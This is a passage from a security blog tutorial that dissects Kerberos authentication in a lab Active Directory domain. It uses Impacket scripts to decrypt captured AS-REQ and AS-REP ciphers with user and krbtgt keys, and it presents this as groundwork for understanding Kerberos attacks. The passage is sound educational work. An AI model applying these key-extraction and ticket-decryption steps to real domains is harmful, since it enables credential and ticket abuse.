decoding=\"async\" class=\"alignnone size-large wp-image-590\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-9.02.01-PM-1024x636.png\" alt=\"\" width=\"1024\" height=\"636\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-9.02.01-PM-1024x636.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-9.02.01-PM-300x186.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-9.02.01-PM-768x477.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-9.02.01-PM-1536x953.png 1536w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-9.02.01-PM.png 1666w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">host=alerter,appmgmt,cisvc,clipsrv,browser,dhcp,dnscache,replicator,eventlog,eventsystem,policyagent,oakley,\r\ndmserver,dns,mcsvc,fax,msiserver,ias,messenger,netlogon,netman,netdde,netddedsm,nmagent,plugplay,protectedstorage,\r\nrasman,rpclocator,rpc,rpcss,remoteaccess,rsvp,samss,scardsvr,scesrv,seclogon,scm,dcom,cifs,spooler,snmp,schedule,\r\ntapisrv,trksvr,trkwks,ups,time,wins,www,http,w3svc,iisadmin,msdt<\/pre>\n<p>So don&#8217;t get confused when you find the &#8220;host&#8221; SPN at Wireshark while connecting to some services.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Summary\"><\/span>Summary<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>SPNs are used when authenticating to any service using Kerberos, the service must have a registered SPN in order for Kerberos to be used for authentication.<br \/>\nSPN&#8217;s format is ServiceClass\/host:port<\/p>\n<h1><span class=\"ez-toc-section\" id=\"Kerberos_authentication\"><\/span>Kerberos authentication<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<h2><span class=\"ez-toc-section\" id=\"Setting_up\"><\/span>Setting up<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Assume user jnkfo\\win10user need to connect to SMB service at win10.jnkfo.lab, I will use Impacket to do so and Wireshark to track everything<\/p>\n<p>The following code will do so<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">from impacket.smbconnection import SMBConnection\r\nsmbconn = SMBConnection(\"win10.jnkfo.lab\", \"192.168.18.10\")\r\nlogin = smbconn.kerberosLogin(\"win10user\", \"P@ssw0rd\", \"jnkfo.lab\", \"\",\"\",\"\", kdcHost=\"192.168.18.2\")\r\nprint login<\/pre>\n<p>Hostname : win10.jnkfo.lab<br \/>\nHost IP: 192.168.18.10<br \/>\nusername: win10user<br \/>\nDomain name: jnkfo.lab<br \/>\nKDC Host (Domain controller) : 192.168.18.2<\/p>\n<p>Before executing the code, launch Wireshark and use the following filter &#8220;<strong>kerberos or smb or smb2<\/strong>&#8221; to track just the smb and Kerberos packets<\/p>\n<p class=\"p1\">Once u execute the command, you will see some packets in Wireshark<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-592\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-24-at-4.24.04-PM-1024x485.png\" alt=\"\" width=\"1024\" height=\"485\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-592\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-24-at-4.24.04-PM-1024x485.png\" alt=\"\" width=\"1024\" height=\"485\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-24-at-4.24.04-PM-1024x485.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-24-at-4.24.04-PM-300x142.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-24-at-4.24.04-PM-768x364.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-24-at-4.24.04-PM-1536x728.png 1536w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-24-at-4.24.04-PM-2048x970.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<p>Once you got that, we&#8217;re ready to go.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"In_a_nutshell\"><\/span>In a nutshell<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Let&#8217;s split the connection into 2 parts,<br \/>\n1 &#8211; Client &lt;&#8212;-&gt; KDC<br \/>\n2 &#8211; Client &lt;&#8212;-&gt; Service<\/p>\n<p>I won&#8217;t discuss the SMB negotiation here, it&#8217;s already discussed in the previous part, we&#8217;re more interested in the Kerberos auth process.<br \/>\nFirst, the client is contacting the KDC to retrieve a ticket, Then, the client presents that ticket to the service, as proof of his identity.<\/p>\n<p>The 1st part (Client &lt;&#8212;-&gt; KDC) involves the following<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-593\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/4.png\" alt=\"\" width=\"866\" height=\"417\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-593\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/4.png\" alt=\"\" width=\"866\" height=\"417\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/4.png 866w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/4-300x144.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/4-768x370.png 768w\" sizes=\"auto, (max-width: 866px) 100vw, 866px\" \/><\/noscript><\/p>\n<p><strong>1 &#8211; AS-REQ<\/strong> <strong>(Authentication request)<\/strong>:<\/p>\n<p>The client hashes the user&#8217;s password, uses that hash to encrypt the current timestamp, and sends the encrypted timestamp to the KDC.<br \/>\nThe KDC already has a copy of the user&#8217;s hash so it uses the hash and tries to decrypt that message to retrieve the timestamp.<br \/>\nIf the decryption is successful, then the KDC knows that the client used the correct hash\u00a0and hence proved his identity to that KDC<\/p>\n<p><strong>2 &#8211; AS-REP (Authentication reply)<\/strong>: The Authentication service (AS) replies with two messages<br \/>\nA &#8211; A session key encrypted using the user&#8217;s hash, that key will be used for future messages.<br \/>\nB &#8211; TGT (ticket-granting ticket), That TGT contains information regarding the user and his privileges on the domain, This message is encrypted using the hash of the KRBTGT account\u2019s password. That hash is known only to the KDC, so only the KDC can decrypt the TGT.<\/p>\n<p><strong>3 &#8211; TGS-REQ (Ticket Granting Service request): <\/strong>The client now has the TGT, he then requests a ticket to access the service he wants, so the client encrypts that request using the session key and sends it to the KDC which will decrypt and validate it. The TGT is also sent in that request.<\/p>\n<p><strong>4 &#8211; TGS-REP:<\/strong> After validating the TGT the KDC responds with two messages<br \/>\nA &#8211; A message specialized for the targeted service, encrypted with the service&#8217;s hash which is stored at the KDC, this includes the information in the TGT as well as a session key<br \/>\nB &#8211; A message for the client containing a session key for further requests between the client and the service he asked to access, which is encrypted using the key retrieved from the AS-REP step.<\/p>\n<p>The 2nd part Client &lt;&#8212;-&gt; Service<br \/>\nThe client presents the message (TGS) from the TGS-REP step while connecting to the service along with an encrypted part, called authenticator message, this part includes the user&#8217;s name and timestamp which was encrypted and will be decrypted using the service session key.<br \/>\nThen compare the username and timestamp from the TGS with the username and timestamp from the authenticator message.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-579\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2.jpg\" alt=\"\" width=\"776\" height=\"171\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-579\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2.jpg\" alt=\"\" width=\"776\" height=\"171\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-579\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2.jpg\" alt=\"\" width=\"776\" height=\"171\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2.jpg 744w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2-300x66.jpg 300w\" sizes=\"auto, (max-width: 776px) 100vw, 776px\" \/><\/noscript><\/noscript><\/p>\n<p>That&#8217;s how Kerberos works without digging deep, but that&#8217;s not enough AT ALL to understand Kerberos attacks.<br \/>\nIt&#8217;s better to dig deeper in each message and how it&#8217;s working, the information it contains, and what each piece of information will be used for.<br \/>\nThat&#8217;s what I will be discussing using the packets I&#8217;ve captured earlier<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-594\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/5-1024x204.png\" alt=\"\" width=\"1024\" height=\"204\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-594\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/5-1024x204.png\" alt=\"\" width=\"1024\" height=\"204\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/5-1024x204.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/5-300x60.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/5-768x153.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/5.png 1125w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<h2><span class=\"ez-toc-section\" id=\"Pre_AS-REQ\"><\/span>Pre AS-REQ<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><strong>1 &#8211;<\/strong> The client tries to send an AS-REQ message to the KDC containing the following information<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-597\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/6-1-1024x673.png\" alt=\"\" width=\"1024\" height=\"673\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-597\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/6-1-1024x673.png\" alt=\"\" width=\"1024\" height=\"673\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/6-1-1024x673.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/6-1-300x197.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/6-1-768x505.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/6-1.png 1115w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<p><strong>The 1st part includes<\/strong><\/p>\n<ul>\n<li>The message type or the Application class tag number (10)<\/li>\n<li>Kerberos version (pvno = 5)<\/li>\n<li>The padata which contains the authentication type <strong>128<\/strong> (PA-PAC-REQUEST) which indicates either PAC is present or not, in this case, you&#8217;ll find that Kerberos.include_pac is true so it means &#8220;no PAC is present, include the PAC&#8221;<\/li>\n<\/ul>\n<p><strong>The 2nd part<\/strong> includes the ticket flags or attributes<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-598\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/7.png\" alt=\"\" width=\"768\" height=\"784\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-598\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/7.png\" alt=\"\" width=\"768\" height=\"784\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/7.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/7-294x300.png 294w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/noscript><\/p>\n<ul>\n<li>Forwardable: The ticket can be forwarded, This flag is typically set during the AS exchange and is used by the TGS when issuing tickets.<\/li>\n<li>proxiable: the ticket can be sent to a proxy and used by a proxy.<\/li>\n<li>renewable: The client can request to have the ticket renewed instead of having a new ticket issued when the current expires<\/li>\n<\/ul>\n<p><strong>The 3rd part includes<\/strong><\/p>\n<ul>\n<li>CnameString: which is the username we&#8217;re using to login &#8220;<strong>win10user<\/strong>&#8220;<\/li>\n<li>realm: which is the uppercase of the full name of the domain we&#8217;re logging in to &#8220;jnkfo.lab&#8221;<\/li>\n<\/ul>\n<p><strong>The 4th part includes<\/strong><\/p>\n<ul>\n<li>SnameString: which is the name of the Kerberos service we need (krbtgt in that case)<\/li>\n<li>realm: which is the uppercase of the full name of the domain &#8220;jnkfo.lab&#8221;<\/li>\n<\/ul>\n<p><strong>The 5th part includes<\/strong> the encryption algorithm which will be used (AES256 in this case)<\/p>\n<p><span style=\"color: #ff0000;\">The full message is in plaintext, no secrets are shared at all<\/span><\/p>\n<h2><span class=\"ez-toc-section\" id=\"KRB5KDC_ERR_PREAUTH_REQUIRED\"><\/span><strong>KRB5KDC_ERR_PREAUTH_REQUIRED<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>The KDC responds to the client that it needs more information to prove that he own the password (key) of the user he&#8217;s authenticating as<br \/>\nthat&#8217;s the part in which the user&#8217;s password or hash is needed.<br \/>\nYou&#8217;ll find many old parameters included in the message already, but yet some new parameters are sent to the client<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-599\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/8-1024x674.png\" alt=\"\" width=\"1024\" height=\"674\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-599\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/8-1024x674.png\" alt=\"\" width=\"1024\" height=\"674\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/8-1024x674.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/8-300x197.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/8-768x505.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/8.png 1067w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<ul>\n<li>stime: The current server time<\/li>\n<li>susec: The server&#8217;s timestamp in microseconds<\/li>\n<li>salt: JNKFO.LABwin10user<\/li>\n<li>And obviously the error code<\/li>\n<\/ul>\n<h2><span class=\"ez-toc-section\" id=\"AS-REQ\"><\/span>AS-REQ<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>From now and on you&#8217;ll notice that there is an encrypted part and a plaintext part, this will be obvious in a few seconds.<br \/>\nIn this step, the user&#8217;s hash will be used to encrypt the timestamp and send it to the KDC, The packet includes<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-600\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/9.png\" alt=\"\" width=\"1009\" height=\"705\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-600\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/9.png\" alt=\"\" width=\"1009\" height=\"705\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/9.png 1009w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/9-300x210.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/9-768x537.png 768w\" sizes=\"auto, (max-width: 1009px) 100vw, 1009px\" \/><\/noscript><\/p>\n<p>This request includes everything in the 1st AS-REQ message including<\/p>\n<ul>\n<li>Cname: already discussed, contain the client principal name (win10user@JNKFO.LAB)<\/li>\n<li>Sname: already discussed, contains the service principal name (krbtgt@JNKFO.LAB)<\/li>\n<\/ul>\n<p>and more importantly, the encrypted timestamp part which can be found at the <strong>cipher<\/strong> field.<br \/>\nThe value is : e881a392d5eb0f57f7cd023a5b6eaaf5df73c023011fa8837e501769417a90c3ed73372c689c930881129b913904cde1c908fa7469775e39<br \/>\netype: which is the encryption type used while encrypting the timestamp, which is AES256<\/p>\n<p>to decrypt that message we need to get the AES256 key for the user, then use it to decrypt the cipher<br \/>\nThe following code will help<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">from binascii import unhexlify, hexlify\r\nfrom impacket.krb5.crypto import Key, _enctype_table, InvalidChecksum\r\nfrom pyasn1.codec.der import decoder, encoder\r\ncipher = _enctype_table[18]\r\npassword = \"P@ssw0rd\"\r\nsalt = \"JNKFO.LABwin10user\"\r\nkey = cipher.string_to_key(password, salt, None)\r\n#hexlify(key.contents)\r\nmycipher = \"e881a392d5eb0f57f7cd023a5b6eaaf5df73c023011fa8837e501769417a90c3ed73372c689c930881129b913904cde1c908fa7469775e39\"\r\nenctimestamp = cipher.decrypt(key, 1, unhexlify(mycipher))\r\ndec = decoder.decode(enctimestamp)\r\nfor i in dec:\r\n\tprint i\r\n<\/pre>\n<p>This will produce the following output, which is the clear text timestamp<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">Sequence:\r\n field-0=20200424142303Z\r\n field-1=197279\r\n<\/pre>\n<p>The message is sent to to the KDC which will proceed with the authentication process<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-601\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/10.png\" alt=\"\" width=\"791\" height=\"205\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-601\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/10.png\" alt=\"\" width=\"791\" height=\"205\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/10.png 791w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/10-300x78.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/10-768x199.png 768w\" sizes=\"auto, (max-width: 791px) 100vw, 791px\" \/><\/noscript><\/p>\n<h2><span class=\"ez-toc-section\" id=\"AS-REP\"><\/span>AS-REP<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>The KDC has a copy of the user&#8217;s key, so if the user encrypted the timestamp using the correct key, the KDC will be able to decrypt it and hence the KDC assured that the client used the user&#8217;s correct password.<\/p>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-602\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/11.png\" alt=\"\" width=\"613\" height=\"271\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-602\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/11.png\" alt=\"\" width=\"613\" height=\"271\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/11.png 613w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/11-300x133.png 300w\" sizes=\"auto, (max-width: 613px) 100vw, 613px\" \/><\/noscript><\/p>\n<p>Once this step is done the KDC generates a random session key, sends the <strong>AS-REP (Authentication reply)<\/strong>, which contain 2 messages<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-603\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/12.png\" alt=\"\" width=\"986\" height=\"643\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-603\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/12.png\" alt=\"\" width=\"986\" height=\"643\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/12.png 986w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/12-300x196.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/12-768x501.png 768w\" sizes=\"auto, (max-width: 986px) 100vw, 986px\" \/><\/noscript><\/p>\n<h3><span class=\"ez-toc-section\" id=\"Message_A\"><\/span>Message A<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>Which is encrypted using the user&#8217;s secret key, and so it can be decrypted and read by the user.<br \/>\nThe message contains the following information<\/p>\n<ul>\n<li>TGS session key<\/li>\n<li>TGS name<\/li>\n<li>Timestamp<\/li>\n<li>Lifetime<\/li>\n<\/ul>\n<p>We can decrypt and read these data using win10user&#8217;s key, let&#8217;s get the key directly from the DC instead of generating it using the plaintext password<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-604\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/13.png\" alt=\"\" width=\"780\" height=\"621\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-604\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/13.png\" alt=\"\" width=\"780\" height=\"621\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/13.png 780w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/13-300x239.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/13-768x611.png 768w\" sizes=\"auto, (max-width: 780px) 100vw, 780px\" \/><\/noscript><\/p>\n<p>The Etype in the packet is 18, meaning we will need the AES256 key,<br \/>\nUsing the following script to decrypt the cipher in message A will help us understand what&#8217;s going on<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\">from pyasn1.codec.der import decoder, encoder\r\nfrom binascii import unhexlify, hexlify\r\nfrom impacket.krb5.crypto import Key, _enctype_table, InvalidChecksum\r\ncipher = _enctype_table[18]\r\nkey = Key(18, unhexlify(\"1ed620f476644bb555227e913400edf446980824f60564ee4bd3430ca34981c1\"))\r\nmycipher = \"d20a921ad48dbdf8616f85e05418466c8021f7b45b8adf4ffa59940260c23c2e1eb88fcb2603a6625c81d0a7c840db62bf7cbb4e22d5de52f303155a0098f3e7ea3a98d226c3ff572429df5156656c51d8880bd87c355929189f501970bcd8aeef6405e908131f26c8701075b2314a96de39e4727698081e989bb35716c5dc3081bd071d1c9938b078a170a5697fd3dbe1879ed48a490c8914221d94feb13e126a011dad7584bd1db525dabd159534e936578ff1e4120c3183367d190587aaf64e51e2c140542dbcc170c933cb62ebe3a736674054fa6921732351b5854e6918d79e1614983a224b20af9bc36c28e89a404aa736b6405ed18cd21a5eb7c8a82b5112287aeb650757cd4e\"\r\njnk = cipher.decrypt(key, 3, unhexlify(mycipher))\r\ndec = decoder.decode(jnk)\r\nfor i in dec:\r\n  print i<\/pre>\n<p>The output is<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">Sequence:\r\n field-0=Sequence:\r\n  field-0=18\r\n  field-1=0x64586df7e4620c197c1889f84d3aa825c4c6060d12633a83bfc9af11f5fdab64\r\n\r\n field-1=SequenceOf:\r\n  Sequence:\r\n   field-0=0\r\n   field-1=20200424142303Z\r\n\r\n field-2=755736468\r\n field-3=20200524145835Z\r\n field-4=1356922880\r\n field-5=20200424142303Z\r\n field-6=20200424142303Z\r\n field-7=20200425002303Z\r\n field-8=20200425142303Z\r\n field-9=JNKFO.LAB\r\n field-10=Sequence:\r\n  field-0=1\r\n  field-1=SequenceOf:\r\n   krbtgt   JNKFO.LAB\r\n<\/pre>\n<p>You will notice some familiar fields, such as the<\/p>\n<ul>\n<li>The TGS service name: krbtgt<\/li>\n<li>Realm: jnkfo.lab<\/li>\n<li><strong>Session key<\/strong> : <span style=\"color: #ff0000;\">0x64586df7e4620c197c1889f84d3aa825c4c6060d12633a83bfc9af11f5fdab64<\/span><\/li>\n<li>Timestamp: 20200424142303<\/li>\n<\/ul>\n<h3><span class=\"ez-toc-section\" id=\"Message_B_TGT\"><\/span>Message B (TGT)<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-605\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/14.png\" alt=\"\" width=\"715\" height=\"245\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-605\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/14.png\" alt=\"\" width=\"715\" height=\"245\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/14.png 715w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/14-300x103.png 300w\" sizes=\"auto, (max-width: 715px) 100vw, 715px\" \/><\/noscript><\/p>\n<p>This includes a plaintext part that contains the SPN (TGS name &lt;krbtgt&gt;) and an encrypted part which is making the Ticket Granting Ticket (TGT).<\/p>\n<p>The 2nd part (enc-part) contains the following information<\/p>\n<ul>\n<li>Username<\/li>\n<li>Realm<\/li>\n<li>Session key<\/li>\n<li>Timestamp<\/li>\n<li>Lifetime<\/li>\n<\/ul>\n<p>That part is encrypted using the krbtgt key, which only the KDC knows, and so only KDC can decrypt this part.<br \/>\nWe can get the krbtgt key using the same method explained at Message A, and so we can decrypt that cipher using the following code<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">from pyasn1.codec.der import decoder, encoder\r\nfrom binascii import unhexlify, hexlify\r\nfrom impacket.krb5.crypto import Key, _enctype_table, InvalidChecksum\r\ncipher = _enctype_table[18]\r\nkey = Key(18, unhexlify(\"8b4b161245435ee310d420c195995f2d22b88c680dae09196cd29e4e05723638\"))\r\nmycipher = \"65c0e02f31835d711d581eafba47461c767aaae82cc2677925822df7ba88fcf2ae1b06c239028c22ab0b69ecb4ccd0da2cc3d5fdbb3f3144f5cee858ce152865dcc6bcf5a6c7288926c85ac7a89c8ce911ebe34bf8f3575ba395b21cdfa74b6103ab7441ed4afa07804dc22a34f102f737c05f2a10ca1b99d926ac13e2f563ccac3cfbdd6049d076803609595b77ff76eaa3a0a18209b7b4159ad8ec2ec9d1c164ebff949918dedf153d9d881d182cad5e1a3f1fc61bd23f4eee710812d8b0bfe5b4d0140700f1efdd2dec1a9f2190a4956bcf4362d101399f910bcbe339f8de33715b947fb7d56d2cd0622dd994963583e9cce686737bd6623b28b18e28eb29a319b4c64f50c28e8736c218039196907e9e5694d2a017bf714b6a94315e32395447e46a34d8dbe9a24d05c95f596ef263ee73e0ff221592631da6ecf5baa07c7441ddd66dd53813d81639be67203a86bd63b188894c30c80b4bf9bc100f0ea8a9d9a5712dc3e311f82c04a2fe01ec73f804e839b7030530952e79fd34df82436665c9a8d8399ffe2f36c611010137cee12847ae04803a54390ad907ca03cbf8a3fe3db1be254861d70aa93b43b3e0ee669dc221297782e3e3e4b6c25c4b6e8f7621e4efc568afd40be7dd9bda17b01282461ee5cf562ca1cdea820d13cdb1fa007e3bde2102bd0ca24e1527dcb0772bb98b7dc0f17c2b699657a6678d73fecc99545e76fcd9fff75598b8129222117f19e56536406cdb42f9fb1ea3820d8c33687dd2e87ba361794841b23fab0d8c8a37d6cd3fe2d033bd861ff89e3ecc894b20b88af2881af91ea3a2b5f26fb5a958292da07bde177cc6a1a7eec04cfdf028366e51fdf0d5a977ce513bbd1